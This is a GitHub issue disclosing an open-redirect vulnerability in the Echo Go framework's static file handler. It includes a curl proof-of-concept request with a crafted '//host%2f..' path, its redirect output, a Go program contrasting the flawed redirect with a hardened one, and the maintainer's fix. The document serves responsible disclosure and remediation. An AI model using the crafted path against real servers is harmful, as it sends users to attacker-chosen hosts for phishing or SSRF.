
vulnerability: open redirect in static handler #2259

Closed
ruokeqx opened this issue Sep 4, 2022 · 3 comments · Fixed by #2260

Comments


ruokeqx commented Sep 4, 2022

Issue Description

301 redirect and may further cause ssrf

see:
go-macaron/macaron#198

also see:
Django CVE-2018-14574

package main

import (
	"github.com/labstack/echo/v4"
)

func main() {
	e := echo.New()
	e.Static("/", "./")
	e.Logger.Fatal(e.Start(":1323"))
}
D:\> curl -Lv http://127.0.0.1:1323//ruokeqx.gitee.io%2f..
*   Trying 127.0.0.1:1323...
* Connected to 127.0.0.1 (127.0.0.1) port 1323 (#0)
> GET //ruokeqx.gitee.io%2f.. HTTP/1.1
> Host: 127.0.0.1:1323
> User-Agent: curl/7.83.1
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< Location: //ruokeqx.gitee.io/../
< Date: Sun, 04 Sep 2022 18:47:04 GMT
< Content-Length: 0
<
* Connection #0 to host 127.0.0.1 left intact
* Clear auth, redirects to port from 1323 to 80
* Issue another request to this URL: 'http://ruokeqx.gitee.io/'
*   Trying 212.64.63.190:80...
* Connected to ruokeqx.gitee.io (212.64.63.190) port 80 (#1)
> GET / HTTP/1.1
> Host: ruokeqx.gitee.io
> User-Agent: curl/7.83.1
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 04 Sep 2022 18:47:03 GMT
< Content-Type: text/html
< Content-Length: 182
< Connection: keep-alive
< Server: openresty
< Location: https://ruokeqx.gitee.io/
< Expires: Mon, 05 Sep 2022 18:47:03 GMT
< Cache-Control: max-age=86400
<
* Ignoring the response-body
* Connection #1 to host ruokeqx.gitee.io left intact
* Clear auth, redirects to port from 80 to 443
* Issue another request to this URL: 'https://ruokeqx.gitee.io/'
*   Trying 212.64.63.190:443...
* Connected to ruokeqx.gitee.io (212.64.63.190) port 443 (#2)
* schannel: disabled automatic use of client certificate
* ALPN: offers http/1.1
* ALPN: server accepted http/1.1
> GET / HTTP/1.1
> Host: ruokeqx.gitee.io
> User-Agent: curl/7.83.1
> Accept: */*
>
* schannel: failed to decrypt data, need more data
* schannel: failed to decrypt data, need more data
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 04 Sep 2022 18:47:04 GMT
< Content-Type: text/html
< Content-Length: 94632
< Connection: keep-alive
< Server: openresty
< Last-Modified: Sun, 04 Sep 2022 17:49:25 GMT
< ETag: "6314e525-171a8"
< Expires: Mon, 05 Sep 2022 18:47:04 GMT
< Cache-Control: max-age=86400
< Accept-Ranges: bytes
<
<!DOCTYPE html>
...
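The capture above shows the mechanism: a request path that begins with two slashes is turned into a trailing-slash redirect, and a Location value of the form `//host/...` is protocol-relative, so the client resolves it against the attacker-chosen host rather than the server's own origin. The following Go program is an added example, not code from the issue or from the Echo project. It assumes the static handler sees the percent-decoded request path (`//ruokeqx.gitee.io/..`, as the Location header in the capture implies) and builds its redirect by appending `/`; the function names are mine. It reproduces the weak redirect, shows with `net/url` which host a client would actually be sent to, and applies the defensive normalisation (collapse any leading run of `/` or `\` to a single `/`) that keeps the redirect on the same origin.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// hostOfRedirect resolves a Location value the way an HTTP client does,
// against the vulnerable server's own origin, and reports the host the
// client would connect to next. A target with an empty scheme that starts
// with "//" is protocol-relative: the client keeps "http" but takes the
// host from the target, which is what makes the redirect "open".
func hostOfRedirect(location string) (string, error) {
	base, err := url.Parse("http://127.0.0.1:1323/") // origin from the capture
	if err != nil {
		return "", err
	}
	ref, err := url.Parse(location)
	if err != nil {
		return "", err
	}
	return base.ResolveReference(ref).Host, nil
}

// sanitizeRedirectTarget collapses a leading run of slashes and backslashes
// into a single "/". Browsers treat "//", "\\", "/\" and "\/" prefixes as
// the start of an authority, so only a single leading "/" is safe for a
// same-origin redirect. Everything else in the path is left untouched.
func sanitizeRedirectTarget(target string) string {
	if len(target) > 1 &&
		(target[0] == '/' || target[0] == '\\') &&
		(target[1] == '/' || target[1] == '\\') {
		return "/" + strings.TrimLeft(target, `/\`)
	}
	return target
}

// directoryRedirect builds the trailing-slash redirect a static file handler
// issues when a directory is requested without a final "/". With
// hardened=false it uses the request path verbatim, reproducing the reported
// behaviour; with hardened=true it normalises the target first.
func directoryRedirect(requestPath string, hardened bool) string {
	target := requestPath
	if !strings.HasSuffix(target, "/") {
		target += "/"
	}
	if hardened {
		target = sanitizeRedirectTarget(target)
	}
	return target
}

func main() {
	// Decoded form of the request path from the report (constructed input).
	requestPath := "//ruokeqx.gitee.io/.."

	for _, hardened := range []bool{false, true} {
		loc := directoryRedirect(requestPath, hardened)
		host, err := hostOfRedirect(loc)
		if err != nil {
			fmt.Println("parse error:", err)
			continue
		}
		fmt.Printf("hardened=%-5v Location: %-26s client goes to host: %s\n", hardened, loc, host)
	}
}
```

Run as-is to see the weak redirect send the client to `ruokeqx.gitee.io` while the hardened one stays on `127.0.0.1:1323`. The same normalisation is worth applying anywhere a redirect target is derived from request input, not only in static-file handlers, and the `hostOfRedirect` check doubles as a cheap unit test for redirect-building code: if the resolved host ever differs from the server's own, the redirect is open.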
@ruokeqx ruokeqx changed the title vulnerability: redirect in static handler vulnerability: open redirect in static handler Sep 4, 2022
aldas added a commit to aldas/echo that referenced this issue Sep 4, 2022
…Handler (used by e.Static, e.StaticFs etc)

remove pre Go1.16 and after differences
aldas added a commit that referenced this issue Sep 4, 2022
…(used by e.Static, e.StaticFs etc)

remove pre Go1.16 and after differences
@aldas
Contributor

aldas commented Sep 4, 2022

This is fixed in (just now released) version 4.9.0

@aldas
Contributor

aldas commented Sep 5, 2022

@ruokeqx Thank you for reporting this.

@marcelo321

How is this critical? It looks like a normal open redirect with code 301. I don't see how this can be escalated to critical severity; can anyone enlighten me please? @ruokeqx
